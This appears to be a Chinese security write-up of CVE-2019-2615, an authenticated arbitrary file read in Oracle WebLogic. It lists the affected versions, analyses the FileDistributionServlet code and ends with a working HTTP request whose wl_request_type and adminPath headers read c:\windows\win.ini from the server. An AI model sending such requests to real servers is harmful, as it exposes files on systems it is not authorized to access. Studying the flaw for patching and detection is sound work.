(CVE-2019-2615)Weblogic 任意文件读取漏洞¶
一、漏洞简介¶
攻击者可以在已知用户名密码的情况下读取WebLogic服务器中的任意文件。
二、漏洞影响¶
Weblogic 10.3.6.0Weblogic 12.1.3.0Weblogic 12.2.1.2Weblogic 12.2.1.3
三、复现过程¶
漏洞分析¶
该功能的关键代码在
weblogic.management.servlet.FileDistributionServlet的doGet()方法中:
public void doGet(final HttpServletRequest var1, final HttpServletResponse var2) throws ServletException, IOException { AuthenticatedSubject var3 = this.authenticateRequest(var1, var2); if(var3 != null) { final String var4 = var1.getHeader("wl_request_type"); if(var3 != KERNEL_ID) { AdminResource var5 = new AdminResource("FileDownload", (String)null, var4); if(!this.am.isAccessAllowed(var3, var5, (ContextHandler)null)) { ManagementLogger.logErrorFDSUnauthorizedDownloadAttempt(var3.getName(), var4); var2.sendError(401); return; } } try { if(debugLogger.isDebugEnabled()) { debugLogger.debug("---- >doGet incoming request: " + var4); } if(var4.equals("wl_xml_entity_request")) { this.doGetXMLEntityRequest(var1, var2); } else if(var4.equals("wl_jsp_refresh_request")) { this.doGetJspRefreshRequest(var1, var2); } else if(var4.equals("file")) { this.doGetFile(var1, var2); } else if(!var4.equals("wl_init_replica_request") && !var4.equals("wl_file_realm_request") && !var4.equals("wl_managed_server_independence_request")) { var2.addHeader("ErrorMsg", "Bad request type"); String var10 = Utils.encodeXSS(var4); var2.sendError(400, "Bad request type: " + var10); ManagementLogger.logBadRequestInFileDistributionServlet(var4); } else { ...... ...... } } } catch (Exception var9) { if(!Kernel.isInitialized()) { throw new AssertionError("kernel not initialized"); } ManagementLogger.logErrorInFileDistributionServlet(var4, var9); } } }
代码也比较简单,先取request中header的参数\"wl_request_type\"的值,然后判断如果该值等于"wl_xml_entity_request"、"wl_jsp_refresh_request"、"file"......则分别调用各自的方法,进入下一步判断。我们看一下如果wl_request_type的值为"wl_jsp_refresh_request",进入doGetJspRefreshRequest()方法。我们跟入doGetJspRefreshRequest()方法:
private void doGetJspRefreshRequest(HttpServletRequest var1, HttpServletResponse var2) throws IOException { String var3 = var1.getHeader("adminPath"); try { FileInputStream var4 = new FileInputStream(var3); try { var2.setContentType("text/plain"); var2.setStatus(200); this.returnInputStream(var4, var2.getOutputStream()); } finally { var4.close(); } } catch (IOException var10) { String var5 = "I/O Exception getting resource: " + var10.getMessage(); var2.addHeader("ErrorMsg", var5); var2.sendError(500, var5); } }
doGetJspRefreshRequest()方法中的"adminPath"也是request中的header参数,我们在Post包中传入要读取的文件。进入该方法中,直接使用FileInputStream类进行文件读取,故造成了所谓的"任意文件读取"漏洞。
漏洞复现¶
GET /bea_wls_management_internal2/wl_management HTTP/1.1 Host: www.0-sec.org:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close username:weblogic password:admin123456 wl_request_type:wl_jsp_refresh_request adminPath:c:\windows\win.ini Upgrade-Insecure-Requests: 1
Weblogic任意文件读取漏洞/media/rId26.png)